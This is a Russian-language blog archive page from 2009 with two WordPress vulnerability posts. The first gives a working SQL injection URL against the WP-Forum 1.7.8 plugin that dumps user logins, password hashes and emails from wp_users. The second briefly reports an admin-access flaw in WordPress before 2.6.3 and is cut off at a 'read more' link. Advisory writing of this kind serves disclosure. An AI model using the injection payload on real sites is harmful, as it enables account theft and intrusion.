Archive for Январь, 2009
Уязвимость WordPress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL] http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимость в WordPress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией WordPress, возможно некоторые уязвимости в старых версиях WordPress заставят вас задуматься об этом. Jeremias Reith опубликовал уязвимость на сервис Bugtraq которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога. Данная уязвимость исправлена в читать далее ..
